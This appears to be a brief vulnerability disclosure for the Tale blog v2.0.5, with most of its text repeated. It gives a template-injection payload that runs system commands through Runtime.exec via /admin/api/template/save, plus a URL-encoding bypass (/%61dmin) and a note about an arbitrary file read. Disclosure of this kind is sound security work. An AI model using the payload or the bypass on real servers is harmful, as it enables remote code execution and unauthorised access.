For post requests, you only need to configure the X-CSRF-TOKEN request header and the corresponding session
Therefore, an attacker can directly modify the template file to get rce.
And the template engine does not open the sandbox. it makes it particularly easy for attackers.
Just need to set the parameter content to
#set(in=new java.io.InputStreamReader(java.lang.Runtime::getRuntime().exec('xxx').getInputStream()))#set(buf=new java.io.BufferedReader(in))
Then visit the page.
(At the same time, this route /admin/api/template/save has a arbitrary file read)
Env:
Win10
JDK8u261
tale v2.0.5
ezbypass,/%61dmin/api/logs
For post requests, you only need to configure the X-CSRF-TOKEN request header and the corresponding session Therefore, an attacker can directly modify the template file to get rce.
And the template engine does not open the sandbox. it makes it particularly easy for attackers. Just need to set the parameter content to
#set(in=new java.io.InputStreamReader(java.lang.Runtime::getRuntime().exec('xxx').getInputStream()))#set(buf=new java.io.BufferedReader(in))Then visit the page. (At the same time, this route/admin/api/template/savehas a arbitrary file read) Env: Win10 JDK8u261 tale v2.0.5